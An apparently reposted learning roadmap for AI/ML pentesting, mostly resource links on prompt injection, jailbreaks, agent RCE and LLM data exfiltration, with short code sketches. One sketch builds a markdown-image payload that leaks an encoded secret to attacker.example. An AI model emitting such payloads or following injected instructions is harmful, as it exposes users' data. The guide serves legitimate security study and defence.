Nytro · Posted Friday at 02:26 PM

# 🛡️ AI/ML Pentesting Roadmap

A comprehensive, structured guide to learning AI/ML security and penetration testing — from zero to practitioner.

## 📋 Table of Contents

- Prerequisites
- Phase 1 — Foundations
- Phase 2 — AI/ML Security Concepts
- Phase 3 — Prompt Injection & LLM Attacks
- Phase 4 — Hands-On Practice
- Phase 5 — Advanced Exploitation Techniques
- Phase 6 — Real-World Research & Bug Bounty
- Standards, Frameworks & References
- Tools & Repositories
- Books, PDFs & E-Books
- Video Resources
- CTF & Competitions
- Bug Bounty Programs
- Community & News
- Suggested Learning Path by Experience Level

## Prerequisites

Before diving into AI/ML pentesting, ensure you have the following foundation:

### General Security Basics

- PortSwigger Web Security Academy — Free, hands-on web security training (XSS, SQLi, SSRF, etc.)
- TryHackMe — Pre-Security Path
- HackTheBox Academy
- OWASP Top 10

### Programming (Python is essential)

- Python for Everybody — Coursera
- Automate the Boring Stuff with Python — Free online book
- CS50P — Python — Free Harvard course

### APIs & HTTP

- Understand REST APIs, HTTP methods, headers, and authentication flows
- Postman Learning Center
- Practice with tools: curl, Burp Suite, Postman

## Phase 1 — Foundations

### 1.1 Machine Learning Fundamentals

| Resource | Type | Cost |
|---|---|---|
| Machine Learning — Andrew Ng (Coursera) | Course | Audit Free |
| Introduction to ML — edX | Course | Audit Free |
| fast.ai Practical Deep Learning | Course | Free |
| Google Machine Learning Crash Course | Course | Free |
| Kaggle ML Courses | Course | Free |
| 3Blue1Brown — Neural Networks | Video | Free |

### 1.2 Large Language Models (LLMs)

Understanding how LLMs work is critical before attacking them.
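It also helps to see concretely what you will be attacking: most LLM products expose a chat-style HTTP API in which a hidden system message and attacker-reachable user input travel in the same request, which is exactly the structure later prompt-injection phases exploit. A minimal sketch of that request shape (the model name and field layout follow the common chat-completions convention, not any specific vendor's API):

```python
import json

# A chat-completion-style request body. The "system" message carries the
# developer's hidden instructions; the "user" message carries input an
# attacker can influence. Prompt injection works because both end up in
# one undifferentiated token stream inside the model.
def build_chat_request(system_prompt: str, user_input: str) -> dict:
    return {
        "model": "example-model",  # illustrative placeholder, not a real model name
        "messages": [
            {"role": "system", "content": system_prompt},
            {"role": "user", "content": user_input},
        ],
    }

payload = build_chat_request(
    "You are a support bot. Never reveal internal data.",
    "Summarise my last ticket, please.",
)

# This JSON body is what tools like curl, Burp Suite, and Postman let you
# inspect, tamper with, and replay.
print(json.dumps(payload, indent=2))
```

Replaying and mutating the `user` content of such requests is the day-to-day mechanics of LLM pentesting, which is why the APIs & HTTP prerequisite above matters.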
| Resource | Type | Cost |
|---|---|---|
| Andrej Karpathy — Intro to LLMs | Video | Free |
| Andrej Karpathy — Let's build GPT | Video | Free |
| Hugging Face NLP Course | Course | Free |
| LLM University by Cohere | Course | Free |
| Prompt Engineering Guide | Guide | Free |

## Phase 2 — AI/ML Security Concepts

### 2.1 Core Security Concepts

- OWASP LLM Top 10 — The definitive OWASP list for LLM vulnerabilities
- MITRE ATLAS Matrix — Adversarial Threat Landscape for Artificial-Intelligence Systems
- NIST AI Risk Management Framework — Federal AI risk guidance
- IBM — AI Security Overview
- AI Village — LLM Threat Modeling
- Promptingguide — Adversarial Attacks
- HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI

### 2.2 Attack Surface Overview

Key attack vectors in AI/ML systems:

- **Prompt Injection** — Manipulating LLM behavior through crafted inputs
- **Jailbreaking** — Bypassing safety filters and guardrails
- **Model Inversion** — Extracting training data from a model
- **Membership Inference** — Determining whether a given record was in the training set
- **Data Poisoning** — Corrupting training data to influence behavior
- **Adversarial Examples** — Perturbed inputs that fool classifiers
- **Model Extraction/Stealing** — Cloning a model via API queries
- **Supply Chain Attacks** — Malicious models/weights on platforms like Hugging Face
- **Insecure Plugin/Tool Integration** — Exploiting LLM agents with external tools
- **Training Data Exfiltration** — Extracting memorized private data
- **Denial of Service** — Overloading models via crafted prompts

### 2.3 MLOps & Infrastructure Security

- From MLOps to MLOops — JFrog
- Offensive ML Playbook
- AI Exploits — ProtectAI
- Awesome AI Security — ottosulin

## Phase 3 — Prompt Injection & LLM Attacks

### 3.1 Understanding Prompt Injection

- IBM Guide on Prompt Injection
- Simon Willison's Explanation of Prompt Injection
- Learn Prompting — Prompt Hacking and Injection
- PortSwigger LLM Attacks
- NCC Group — Exploring Prompt Injection Attacks
- Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection

### 3.2 Jailbreaking Techniques

- DAN (Do Anything Now) — Classic jailbreak technique:
  - Chatgpt-DAN Repo
- Role-playing / Persona manipulation
- Token smuggling — Encoding instructions to bypass filters
- Prompt leaking — Extracting system prompts
- Indirect prompt injection — Attacks via documents, web content, memory
- WideOpenAI — Jailbreak Collection
- PayloadsAllTheThings — Prompt Injection
- PALLMs — Payloads for Attacking LLMs

### 3.3 Indirect Prompt Injection

A more sophisticated attack in which malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes.

- Greshake — LLM Security / Not What You've Signed Up For
- Embrace The Red — Blog — Comprehensive blog covering real-world indirect injection
- GitHub Copilot Chat: Prompt Injection to Data Exfiltration
- Google AI Studio Data Exfiltration

### 3.4 Advanced Prompt Attack Techniques

- How to Persuade an LLM to Change Its System Prompt
- Bugcrowd Ultimate Guide to AI Security (PDF)
- Snyk OWASP Top 10 LLM (PDF)
- Vanna.AI Prompt Injection RCE — JFrog

## Phase 4 — Hands-On Practice

### 4.1 Interactive Platforms & Games

| Platform | Description | Link |
|---|---|---|
| Gandalf | LLM prompt testing game — extract the password | gandalf.lakera.ai |
| Prompt Airlines | Gamified prompt injection learning | promptairlines.com |
| Crucible | Interactive AI security challenges by Dreadnode | crucible.dreadnode.io |
| Immersive Labs AI | Structured AI security exercises | prompting.ai.immersivelabs.com |
| Secdim AI Games | Prompt injection games | play.secdim.com/game/ai |
| HackAPrompt | Community prompt injection competition | hackaprompt.com |
| PortSwigger LLM Labs | Hands-on web LLM attack labs | Web Security Academy |

### 4.2 Vulnerable-by-Design Projects

| Repository | Description |
|---|---|
| Damn Vulnerable LLM Agent — WithSecureLabs | Intentionally vulnerable LLM agent |
| ScottLogic Prompt Injection Playground | Local prompt injection lab |
| Greshake LLM Security Tools | Proof-of-concept attacks |

### 4.3 CTF Writeups to Study

- CTF Writeup — HackPack CTF 2024 LLM Edition
- LLM Pentest Writeups — System Weakness

## Phase 5 — Advanced Exploitation Techniques

### 5.1 Agent & Tool Integration Attacks

When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically.

- LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec
- LLM Pentest: Leveraging Agent Integration For RCE (full)
- Dumping a Database with an AI Chatbot — Synack
- CSWSH Meets LLM Chatbots

### 5.2 Data Exfiltration via LLMs

- Google AI Studio: LLM-Powered Data Exfiltration
- Google AI Studio Mass Data Exfil (Regression)
- Hacking Google Bard — From Prompt Injection to Data Exfiltration
- AWS Amazon Q Markdown Rendering Vulnerability
- GitHub Copilot Chat Data Exfiltration

### 5.3 Account Takeover & Authentication Attacks

- ChatGPT Account Takeover — Wildcard Web Cache Deception
- Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception)
- Security Flaws in ChatGPT Ecosystem — Salt Security
- OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx

### 5.4 XSS & Web Vulnerabilities in AI Products

- XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva
- Zeroday on GitHub Copilot

### 5.5 Model & Infrastructure Attacks

- ShellTorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9)
- From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva

### 5.6 Persistent Attacks & Memory Exploitation

- ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red

### 5.7 Adversarial Machine Learning

- CleverHans Library — Adversarial example library
- ART (Adversarial Robustness Toolbox) — IBM
- Foolbox — Python toolbox for adversarial attacks

## Phase 6 — Real-World Research & Bug Bounty

### 6.1 Notable Research & Disclosures

- We Hacked Google AI for $50,000 — LandH
- New Google Gemini Content Manipulation Vulnerabilities — HiddenLayer
- Jailbreak of Meta AI (Llama 3.1) Revealing Config Details
- Bypass Instructions to Manipulate Google Bard
- My LLM Bug Bounty Journey on Hugging Face Hub
- Anonymised Penetration Test Report — Volkis
- Lakera Real World LLM Exploits (PDF)

### 6.2 How to Find LLM Vulnerabilities

Key areas to test when assessing an LLM-powered application:

- **System prompt extraction** — Can you leak the hidden system prompt?
- **Instruction override** — Can you make the model ignore system-level instructions?
- **Plugin/tool abuse** — Can agent tools be misused (SSRF, RCE, SQLi)?
- **Data exfiltration via markdown** — Does the UI render attacker-controlled markdown images, leaking data through the image URL?
- **Persistent injection via memory** — Can you inject instructions that persist in memory/RAG?
- **PII leakage** — Does the model reveal training data or other users' data?
- **Cross-user data leakage** — In multi-tenant apps, can you access other users' contexts?
- **Authentication bypass** — Can you trick the LLM into performing privileged actions?

## Standards, Frameworks & References

| Resource | Description |
|---|---|
| OWASP LLM Top 10 | Top 10 LLM vulnerability classes |
| MITRE ATLAS | AI adversarial threat matrix |
| NIST AI RMF | US federal AI risk management framework |
| OWASP AI Exchange | Cross-industry AI security guidance |
| ISO/IEC 42001 | International AI management standard |
| ENISA AI Threat Landscape | EU AI threat landscape report |
| Google Secure AI Framework (SAIF) | Google's AI security framework |

## Tools & Repositories

### Offensive Tools

| Tool | Purpose |
|---|---|
| Garak | LLM vulnerability scanner |
| PyRIT | Microsoft's Python Risk Identification Toolkit for LLMs |
| LLM Fuzzer | Fuzzing framework for LLMs |
| PALLMs | Payloads for attacking LLMs |
| PromptInject | Prompt injection attack framework |
| PurpleLlama / CyberSecEval | Meta's LLM security evaluation |

### Defensive / Scanning Tools

| Tool | Purpose |
|---|---|
| Rebuff | Prompt injection detection |
| NeMo Guardrails | NVIDIA guardrail framework |
| Lakera Guard | Commercial prompt injection protection |
| AI Exploits — ProtectAI | Real-world ML exploit collection |
| ModelScan | Scan ML model files for malicious code |

### Reference Lists

| Resource | Description |
|---|---|
| Awesome LLM Security — corca-ai | Curated LLM security list |
| Awesome LLM — Hannibal046 | Everything LLM, including security |
| Awesome AI Security — ottosulin | General AI security resources |
| LLM Hacker's Handbook | Comprehensive hacking handbook |
| PayloadsAllTheThings — Prompt Injection | Payload collection |
| WideOpenAI | Jailbreak and bypass collection |
| Chatgpt-DAN | DAN jailbreak collection |

## Books, PDFs & E-Books

| Resource | Link |
|---|---|
| LLM Hacker's Handbook | GitHub |
| OWASP Top 10 for LLM (Snyk) | PDF |
| Bugcrowd Ultimate Guide to AI Security | PDF |
| Lakera Real World LLM Exploits | PDF |
| HackerOne Ultimate Guide to Managing AI Risks | E-Book |
| Adversarial Machine Learning — Goodfellow et al. | arXiv |

## Video Resources

| Resource | Link |
|---|---|
| Penetration Testing Against and With AI/LLM/ML (Playlist) | YouTube |
| Andrej Karpathy — Intro to Large Language Models | YouTube |
| DEF CON AI Village Talks | YouTube |
| LiveOverflow — AI/ML Security | YouTube |
| 3Blue1Brown — Neural Networks Series | YouTube |
| John Hammond — AI Security Challenges | YouTube |
| Cybrary — Machine Learning Security | Cybrary |

## CTF & Competitions

| Competition | Description | Link |
|---|---|---|
| Crucible | Ongoing AI security challenges | crucible.dreadnode.io |
| HackAPrompt | Annual prompt injection competition | hackaprompt.com |
| AI Village CTF (DEF CON) | Annual AI security CTF at DEF CON | aivillage.org |
| Gandalf | Self-paced LLM challenge | gandalf.lakera.ai |
| Prompt Airlines | Gamified injection challenges | promptairlines.com |
| Hack The Box AI Challenges | HTB AI-themed challenges | hackthebox.com |
| Secdim AI Games | Web-based AI security games | play.secdim.com/game/ai |

## Bug Bounty Programs

AI/ML security bug bounties are growing rapidly.
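The "data exfiltration via markdown" checks in section 6.2 rest on a single primitive: if the chat UI renders model output as markdown, an injected image link makes the victim's browser send data to an attacker-controlled host. A minimal sketch of the payload shape and a naive output check for it (the `attacker.example` host and the regex are illustrative assumptions, not a specific product's behavior):

```python
import re
import urllib.parse

# Exfiltration primitive: if an injected instruction gets the LLM to emit
# this markdown and the UI renders it, the victim's browser fetches the
# image URL, leaking `secret` in the query string to whoever controls the
# host (attacker.example is a hypothetical attacker domain).
def exfil_markdown(secret: str) -> str:
    encoded = urllib.parse.quote(secret, safe="")
    return f"![loading](https://attacker.example/leak?d={encoded})"

# Naive defender-side check: flag any markdown image pointing at an
# http(s) URL in model output before it reaches the renderer.
IMG_RE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def external_image_urls(model_output: str) -> list[str]:
    return IMG_RE.findall(model_output)

payload = exfil_markdown("session=abc123; user=admin")
print(payload)
print(external_image_urls(f"Here is your summary.\n\n{payload}"))
```

Real products mitigate this with image proxies or strict content security policies, which is why the same bug keeps resurfacing wherever rendering is enabled without them.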
Target these platforms:

| Program | Scope | Link |
|---|---|---|
| OpenAI Bug Bounty | ChatGPT, API, plugins | bugcrowd.com/openai |
| Google AI Bug Bounty | Gemini, Bard, Vertex AI | bughunters.google.com |
| Meta AI Bug Bounty | Llama models, Meta AI | facebook.com/whitehat |
| HuggingFace via ProtectAI | Hub, models, spaces | huntr.com |
| Anthropic Bug Bounty | Claude, API | anthropic.com/security |
| Microsoft (Copilot, Azure AI) | Copilot, Azure OpenAI | msrc.microsoft.com |
| Huntr (AI/ML focused) | Open source ML libraries | huntr.com |

Tips for AI bug bounty:

- Focus on data exfiltration via markdown rendering (a common finding)
- Test plugin/tool integrations thoroughly
- Look for prompt injection in RAG pipelines
- Explore memory and persistent context manipulation
- Check for cross-tenant data leakage in multi-user deployments

## Community & News

### Communities

- AI Village — DEF CON's AI security community
- OWASP AI Exchange — Open standard for AI security
- ProtectAI — AI security research and tools
- Embrace the Red — Blog — Leading blog on LLM security
- Kai Greshake's Research — Indirect prompt injection research

### Newsletters & Blogs

- The Batch — DeepLearning.AI — Weekly AI news
- Simon Willison's Weblog — Authoritative LLM security commentary
- HiddenLayer Research — AI security research
- Lakera Blog — LLM security insights
- PortSwigger Research — Web + AI security research

## Suggested Learning Path by Experience Level

### 🟢 Beginner (0–3 months)

- Complete PortSwigger Web Security Academy fundamentals
- Learn Python basics
- Take Google ML Crash Course
- Read OWASP LLM Top 10
- Play Gandalf — all levels
- Read Simon Willison's prompt injection article
- Watch Andrej Karpathy — Intro to LLMs

### 🟡 Intermediate (3–9 months)

- Study MITRE ATLAS Matrix
- Complete PortSwigger LLM Attack labs
- Set up and exploit Damn Vulnerable LLM Agent
- Complete Prompt Airlines and Crucible challenges
- Read the LLM Hacker's Handbook
- Study the Embrace the Red blog in full
- Experiment with Garak and PyRIT
- Try the Offensive ML Playbook

### 🔴 Advanced (9+ months)

- Participate in the AI Village CTF at DEF CON
- Submit findings to Huntr or the OpenAI Bug Bounty
- Study adversarial ML with ART and CleverHans
- Read academic papers on model inversion, membership inference, and data extraction
- Contribute to open-source tools like Garak or AI Exploits
- Build your own vulnerable LLM demo environment
- Write and publish research — blog posts, CVEs, conference talks

## Key Academic Papers

| Paper | Year |
|---|---|
| Explaining and Harnessing Adversarial Examples — Goodfellow et al. | 2014 |
| Extracting Training Data from Large Language Models — Carlini et al. | 2021 |
| Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al. | 2023 |
| Membership Inference Attacks against Machine Learning Models — Shokri et al. | 2017 |
| Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al. | 2023 |
| Jailbroken: How Does LLM Safety Training Fail? — Wei et al. | 2023 |
| Prompt Injection Attack against LLM-integrated Applications | 2023 |

Last updated: 2025 | Contributions welcome — submit a PR with new resources.

Source: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection
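As a concrete companion to the adversarial-example papers listed above, the fast gradient sign method from Goodfellow et al. (2014) can be sketched in a few lines of plain Python on a toy logistic-regression "model"; libraries like ART, CleverHans, and Foolbox implement the same idea for real networks. All weights and inputs here are synthetic, chosen only for illustration:

```python
import math

# Toy logistic-regression "model": p(y=1|x) = sigmoid(w.x + b).
W = [2.0, -1.0, 0.5]
B = 0.1

def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + math.exp(-z))

def predict(x: list[float]) -> float:
    return sigmoid(sum(w * xi for w, xi in zip(W, x)) + B)

def fgsm(x: list[float], y: float, eps: float) -> list[float]:
    # For logistic regression with cross-entropy loss, the gradient of the
    # loss w.r.t. the input is dL/dx = (p - y) * w. FGSM perturbs each
    # feature by eps in the sign of that gradient, maximally increasing
    # the loss per unit of L-infinity budget.
    p = predict(x)
    grad = [(p - y) * w for w in W]
    return [xi + eps * math.copysign(1.0, g) for xi, g in zip(x, grad)]

x = [1.0, 0.5, -0.2]
clean = predict(x)               # confident "class 1": ~0.82
x_adv = fgsm(x, y=1.0, eps=0.4)  # same point, each feature nudged by 0.4
adv = predict(x_adv)             # confidence collapses to ~0.52

print(f"clean p(y=1) = {clean:.3f}")
print(f"adv   p(y=1) = {adv:.3f}")
```

The small, structured perturbation is imperceptible as a change in the input yet moves the model toward the decision boundary, which is the core phenomenon behind the evasion attacks covered in section 5.7.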